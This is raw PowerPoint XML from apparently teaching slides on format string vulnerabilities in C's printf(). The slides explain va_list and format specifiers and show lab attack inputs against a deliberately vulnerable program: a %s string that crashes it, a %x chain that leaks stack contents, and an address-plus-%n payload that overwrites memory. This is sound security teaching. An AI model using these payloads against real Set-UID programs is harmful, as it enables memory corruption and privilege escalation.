              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pointer.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/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pointer advances using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> macro.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(ap, int)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Moves the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pointer (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) up by 4 bytes.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When all the optional arguments are accessed, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is called.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D96E2-D6B9-4BEE-953C-D1498B96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79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B550F8A8-3DA3-40B5-8AA2-5F75C899DD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8632" y="1666136"/>
            <a:ext cx="3253344" cy="2292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51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283B-76D6-4068-B808-7D03FDF1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/>
              <a:t>access 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D176-86B9-4966-8D43-BF568BC2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193073"/>
            <a:ext cx="8778240" cy="24375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Here,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has three optional arguments. Elements starting with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” are called format </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>specifiers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scans the format string and prints out each character until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” is encountered.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calls </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_arg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, which returns the optional argument pointed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>and advances it to the next argument.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D7AE-FB62-4669-95EA-6586B8A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E1CF1-8CC8-4242-9B37-440A8E7E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38" y="784241"/>
            <a:ext cx="4993723" cy="13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56E-12DB-4B92-A461-382B1365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How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/>
              <a:t>access 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33CF-0979-4AC8-940B-8D7362F6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5881674" cy="376310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invoked, the arguments are pushed onto the stack in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0"/>
              <a:t>reverse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> order.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When it scans and prints the format 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replaces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dirty="0"/>
              <a:t> with the value from the first optional argument and prints out the value.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>va_list</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is then moved to the position 2.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651E-86C1-486C-8FB1-76242865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95">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8D29A42-513C-432F-BDB6-528A9B58C3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2751" y="1450303"/>
            <a:ext cx="3047513" cy="224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874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625"/>
  <p:tag name="ORIGINALWIDTH" val="241.6146"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\pagestyle{empty}&#10;\begin{document}&#10;\ttfamily&#10;&#10;\#include $&lt;$stdio.h$&gt;$&#10;&#10;~&#10;&#10;int printf(const char *format, \dots);&#10;&#10;int fprintf(FILE *stream, const char *format, \dots);&#10;&#10;int dprintf(int fd, const char *format, \dots);&#10;&#10;int sprintf(char *str, const char *format, \dots);&#10;&#10;int snprintf(char *str, size\_t size, const char *format, \dots);&#10;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79167"/>
  <p:tag name="ORIGINALWIDTH" val="4.583333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52099"/>
  <p:tag name="ORIGINALWIDTH" val="3.593766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385433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8646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7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89599"/>
  <p:tag name="ORIGINALWIDTH" val="2.031266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8646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7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646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3.541667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25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2.968766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072933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75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2.916667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2.968766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3.80209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541667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385433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66"/>
  <p:tag name="ORIGINALWIDTH" val="2.916667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072933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437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958333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489599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2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3.541667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5997"/>
  <p:tag name="ORIGINALWIDTH" val="0.9374999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5997"/>
  <p:tag name="ORIGINALWIDTH" val="0.9374999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5997"/>
  <p:tag name="ORIGINALWIDTH" val="0.9374999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89599"/>
  <p:tag name="ORIGINALWIDTH" val="1.979167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1.145833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52099"/>
  <p:tag name="ORIGINALWIDTH" val="3.593766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125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85433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2.031266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66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75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489599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437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2.8646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85433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3021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75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85433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2.916667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4375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906266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75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25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979167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1.093766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79167"/>
  <p:tag name="ORIGINALWIDTH" val="4.583333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41667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4375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125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229167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89599"/>
  <p:tag name="ORIGINALWIDTH" val="1.979167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66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802099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4375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2.916667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4375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25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385433"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\pagestyle{empty}&#10;\begin{document}&#10;\ttfamily&#10;&#10;\#include $&lt;$stdio.h$&gt;$&#10;&#10;~&#10;&#10;int printf(const char *format, \dots);&#10;&#10;int fprintf(FILE *stream, const char *format, \dots);&#10;&#10;int dprintf(int fd, const char *format, \dots);&#10;&#10;int sprintf(char *str, const char *format, \dots);&#10;&#10;int snprintf(char *str, size\_t size, const char *format, \dots);&#10;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33333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2.395833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646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125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33333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25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66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802099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66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75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4375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2.916667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52099"/>
  <p:tag name="ORIGINALWIDTH" val="3.593766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85433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906266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25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5997"/>
  <p:tag name="ORIGINALWIDTH" val="0.9374999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5997"/>
  <p:tag name="ORIGINALWIDTH" val="0.9374999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5997"/>
  <p:tag name="ORIGINALWIDTH" val="0.9895997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89599"/>
  <p:tag name="ORIGINALWIDTH" val="1.979167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85433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1.145833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2.4297"/>
  <p:tag name="ORIGINALWIDTH" val="2602.925"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\pagestyle{empty}&#10;\begin{document}&#10;\ttfamily&#10;&#10;seed@VM\$ ./vul&#10;&#10;\dots\dots&#10;&#10;Please enter a string: \%s\%s\%s\%s\%s\%s\%s\%s&#10;&#10;Segmentation fault (core dumped)&#10;&#10;&#10;&#10;\end{document}"/>
  <p:tag name="IGUANATEXSIZE" val="16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.56252"/>
  <p:tag name="ORIGINALWIDTH" val="255.9375"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\pagestyle{empty}&#10;\begin{document}&#10;\ttfamily&#10;&#10;seed@VM\$ ./vul&#10;&#10;\dots\dots&#10;&#10;Please enter a string: \%x.\%x.\%x.\%x.\%x.\%x.\%x.\%x.&#10;&#10;63.b7fc5ac0.b7eb8309.bffff33f.11223344.252e7825.78252e78.2e78252e&#10;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93752"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\pagestyle{empty}&#10;\begin{document}&#10;\ttfamily&#10;&#10;seed@VM\$ ./vul&#10;&#10;\dots\dots&#10;&#10;Please enter a string: \%x.\%x.\%x.\%x.\%x.\%x.\%x.\%x.&#10;&#10;63.b7fc5ac0.b7eb8309.bffff33f.11223344.252e7825.78252e78.2e78252e&#10;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19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19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25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312519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87519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687519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062519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062519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19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75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062519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375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19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19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19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7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19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19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437519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19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437519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81252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75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625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66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0.9375196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437519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437519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19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437519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979167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437519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19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375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437519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19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375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2.968766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437519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19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0.9375196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25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312519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125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125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2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19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562519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5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25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312519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312519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19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25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2.916667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312519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5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56252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25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31251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19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19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2.968766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19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25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19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19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75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5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312519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25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541667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88889"/>
  <p:tag name="ORIGINALWIDTH" val="272.2222"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\usepackage[a4paper, total={6in, 8in}]{geometry}&#10;\pagestyle{empty}&#10;\begin{document}&#10;\ttfamily&#10;&#10;seed@VM\$ echo \$(printf ``$\backslash$x04$\backslash$xf3$\backslash$xff$\backslash$xbf'').\%x.\%x.\%x.\%x.\%x\%n $&gt;$ input&#10;&#10;&#10;&#10;\end{document}"/>
  <p:tag name="IGUANATEXSIZE" val="18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56"/>
  <p:tag name="ORIGINALWIDTH" val="2.916667"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\usepackage[a4paper, total={6in, 8in}]{geometry}&#10;\pagestyle{empty}&#10;\begin{document}&#10;\ttfamily&#10;&#10;seed@VM\$ echo \$(printf ``$\backslash$x04$\backslash$xf3$\backslash$xff$\backslash$xbf'').\%x.\%x.\%x.\%x.\%x\%n $&gt;$ input&#10;&#10;&#10;&#10;\end{document}"/>
  <p:tag name="IGUANATEXSIZE" val="18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56"/>
  <p:tag name="ORIGINALWIDTH" val="3.055555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56"/>
  <p:tag name="ORIGINALWIDTH" val="3.055555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3.611111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5556"/>
  <p:tag name="ORIGINALWIDTH" val="3.263911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3.680577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6667"/>
  <p:tag name="ORIGINALWIDTH" val="3.680577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055555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56"/>
  <p:tag name="ORIGINALWIDTH" val="3.05555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385433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56"/>
  <p:tag name="ORIGINALWIDTH" val="2.916667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6667"/>
  <p:tag name="ORIGINALWIDTH" val="3.75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56"/>
  <p:tag name="ORIGINALWIDTH" val="3.055555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055555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022"/>
  <p:tag name="ORIGINALWIDTH" val="1.944444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33334"/>
  <p:tag name="ORIGINALWIDTH" val="3.611111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8889"/>
  <p:tag name="ORIGINALWIDTH" val="3.4028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2.847244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8889"/>
  <p:tag name="ORIGINALWIDTH" val="3.819466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94444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2.916667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2.986133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08356"/>
  <p:tag name="ORIGINALWIDTH" val="1.25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08356"/>
  <p:tag name="ORIGINALWIDTH" val="1.180577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88889"/>
  <p:tag name="ORIGINALWIDTH" val="2.916667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541688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22"/>
  <p:tag name="ORIGINALWIDTH" val="3.194444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5556"/>
  <p:tag name="ORIGINALWIDTH" val="3.472222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88889"/>
  <p:tag name="ORIGINALWIDTH" val="2.916667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472222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2.986133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66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22"/>
  <p:tag name="ORIGINALWIDTH" val="3.263911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88889"/>
  <p:tag name="ORIGINALWIDTH" val="2.916667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541688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2.986133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2.986133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88889"/>
  <p:tag name="ORIGINALWIDTH" val="2.986133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541688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3.541688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2.916667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08356"/>
  <p:tag name="ORIGINALWIDTH" val="1.25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072933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08356"/>
  <p:tag name="ORIGINALWIDTH" val="1.25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022"/>
  <p:tag name="ORIGINALWIDTH" val="2.013911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1111"/>
  <p:tag name="ORIGINALWIDTH" val="0.9722222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4028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541688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1111"/>
  <p:tag name="ORIGINALWIDTH" val="0.9722222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4028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541688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1111"/>
  <p:tag name="ORIGINALWIDTH" val="0.9027996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4028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4375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472222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1111"/>
  <p:tag name="ORIGINALWIDTH" val="0.9722222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4028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541688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1111"/>
  <p:tag name="ORIGINALWIDTH" val="0.9027996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4028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67"/>
  <p:tag name="ORIGINALWIDTH" val="3.541688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4445"/>
  <p:tag name="ORIGINALWIDTH" val="3.4028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8889"/>
  <p:tag name="ORIGINALWIDTH" val="3.819466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38889"/>
  <p:tag name="ORIGINALWIDTH" val="4.583333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906266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6134"/>
  <p:tag name="ORIGINALWIDTH" val="2.847244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8889"/>
  <p:tag name="ORIGINALWIDTH" val="3.75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33334"/>
  <p:tag name="ORIGINALWIDTH" val="3.541688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8889"/>
  <p:tag name="ORIGINALWIDTH" val="3.75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94444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37504"/>
  <p:tag name="ORIGINALWIDTH" val="276.25"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\usepackage{lmodern}&#10;\usepackage[a4paper, total={6in, 8in}]{geometry}&#10;\pagestyle{empty}&#10;\begin{document}&#10;\ttfamily&#10;&#10;\fontseries{l}\selectfont&#10;&#10;seed@VM\$ echo \$(printf ``$\backslash$x04$\backslash$xf3$\backslash$xff$\backslash$xbf'').\%x.\%x.\%x.\%x.\%x.\%n $&gt;$ input&#10;&#10;seed@VM\$ vul $&lt;$ input&#10;&#10;Target address: bffff304&#10;&#10;Data at target address: 0x11223344&#10;&#10;Please enter a string: ****.63.b7fc5ac0.b7eb8309.bffff33f.11223344.&#10;&#10;Data at target address: &#10;\fontseries{b}\selectfont &#10;0x2c\qquad $\longleftarrow$ This value is modified!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LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\usepackage{lmodern}&#10;\usepackage[a4paper, total={6in, 8in}]{geometry}&#10;\pagestyle{empty}&#10;\begin{document}&#10;\ttfamily&#10;&#10;\fontseries{l}\selectfont&#10;&#10;seed@VM\$ echo \$(printf ``$\backslash$x04$\backslash$xf3$\backslash$xff$\backslash$xbf'').\%x.\%x.\%x.\%x.\%x.\%n $&gt;$ input&#10;&#10;seed@VM\$ vul $&lt;$ input&#10;&#10;Target address: bffff304&#10;&#10;Data at target address: 0x11223344&#10;&#10;Please enter a string: ****.63.b7fc5ac0.b7eb8309.bffff33f.11223344.&#10;&#10;Data at target address: &#10;\fontseries{b}\selectfont &#10;0x2c\qquad $\longleftarrow$ This value is modified!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062519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489599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25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625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25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062519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93752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87519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062519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1.875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19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75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1.06252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1.06252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2.93752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6"/>
  <p:tag name="ORIGINALWIDTH" val="1.25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19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2.875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875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25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2.93752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875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2.93752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252"/>
  <p:tag name="ORIGINALWIDTH" val="1.125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252"/>
  <p:tag name="ORIGINALWIDTH" val="1.125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1.875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6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375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6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312519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6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375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749999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375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6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375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6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375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87519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562519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19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979167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19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19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25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625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25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062519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62519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66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1.145833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87519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062519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4.625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19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87519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75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625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125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75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75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6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19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875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25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437519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19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75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62519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19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75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19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6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04167"/>
  <p:tag name="ORIGINALWIDTH" val="3.593766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5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5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5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062519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062519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25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25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5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385433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375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19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19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646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625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6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2.875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75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2.875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2.81252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2.875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6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062519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6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19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25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6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19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1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072933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25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062519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6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93752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2.031266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25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25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93752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6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489599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19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19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6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437519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19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760433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75"/>
  <p:tag name="EMFCHILD" val="Tru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62519"/>
  <p:tag name="EMFCHILD" val="Tru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19"/>
  <p:tag name="EMFCHILD" val="Tru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75"/>
  <p:tag name="EMFCHILD" val="Tru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062519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4375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EMFCHILD" val="Tru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EMFCHILD" val="Tru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6"/>
  <p:tag name="EMFCHILD" val="Tru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25"/>
  <p:tag name="EMFCHILD" val="Tru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19"/>
  <p:tag name="EMFCHILD" val="Tru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87519"/>
  <p:tag name="EMFCHILD" val="Tru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6.687519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197"/>
  <p:tag name="ORIGINALWIDTH" val="4.625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66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812519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75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625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19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812519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75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2.8646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875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19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75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75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25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0.8125196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177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385433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7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20833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906266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9167"/>
  <p:tag name="ORIGINALWIDTH" val="1.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66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75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229167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16667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3.593766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802099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385433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2.916667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968766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4375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906266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41667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3"/>
  <p:tag name="ORIGINALWIDTH" val="3.229167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72933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9167"/>
  <p:tag name="ORIGINALWIDTH" val="1.25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895997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4999"/>
  <p:tag name="ORIGINALWIDTH" val="0.9374999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979167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1.093766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2.8646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3"/>
  <p:tag name="ORIGINALWIDTH" val="3.75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0833"/>
  <p:tag name="ORIGINALWIDTH" val="3.1771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9599"/>
  <p:tag name="ORIGINALWIDTH" val="3.541667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11077</TotalTime>
  <Words>1434</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>221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Format string</vt:lpstr>
      <vt:lpstr>The definition of the printf() function</vt:lpstr>
      <vt:lpstr>The definition of the printf() function (cont.)</vt:lpstr>
      <vt:lpstr>Access optional arguments</vt:lpstr>
      <vt:lpstr>Access optional arguments (cont.)</vt:lpstr>
      <vt:lpstr>How printf()access optional arguments</vt:lpstr>
      <vt:lpstr>How printf()access optional arguments</vt:lpstr>
      <vt:lpstr>Format specifiers</vt:lpstr>
      <vt:lpstr>Missing optional arguments</vt:lpstr>
      <vt:lpstr>Untrusted user input becomes format string</vt:lpstr>
      <vt:lpstr>Format string vulnerability</vt:lpstr>
      <vt:lpstr>Vulnerable (Set-UID) codes</vt:lpstr>
      <vt:lpstr>Vulnerable program’s stack layout</vt:lpstr>
      <vt:lpstr>What can we achieve?</vt:lpstr>
      <vt:lpstr>Crash Program</vt:lpstr>
      <vt:lpstr>Print out data on the stack</vt:lpstr>
      <vt:lpstr>Print out data on the stack (cont.)</vt:lpstr>
      <vt:lpstr>Print out data not on the stack</vt:lpstr>
      <vt:lpstr>Print out data at a specific address</vt:lpstr>
      <vt:lpstr>Memory modification via format string</vt:lpstr>
      <vt:lpstr>Endianness</vt:lpstr>
      <vt:lpstr>Change program’s data in the memory</vt:lpstr>
      <vt:lpstr>Change program’s data in the memory (cont.)</vt:lpstr>
      <vt:lpstr>Change program’s data in the memory (cont.)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559</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-04-12T23:12:02Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-16T22:06:26Z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